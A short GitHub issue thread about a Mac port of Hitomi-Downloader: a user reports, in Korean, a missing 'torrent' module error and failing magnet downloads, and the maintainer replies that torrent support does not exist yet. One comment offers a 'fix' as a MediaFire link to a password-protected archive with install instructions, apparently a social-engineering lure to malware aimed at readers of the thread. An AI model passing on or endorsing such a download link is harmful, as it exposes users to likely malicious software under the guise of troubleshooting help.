### ISSUE TITLE
토렌트 advanced Option이 안 열림

### ISSUE THREAD

**Issue by new-Sunset-shimmer** [tenebo/Hitomi-Downloader-Mac#33]
Traceback (most recent call last):
  File "hitomi_downloader_GUI", line 8309, in editTorrentEtc
ModuleNotFoundError: No module named 'torrent'

그리고 magnet으로 다운시 invalid 오류가 뜸

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tenebo** [comment]
Unfortunately, it doesn't support torrent downloading yet
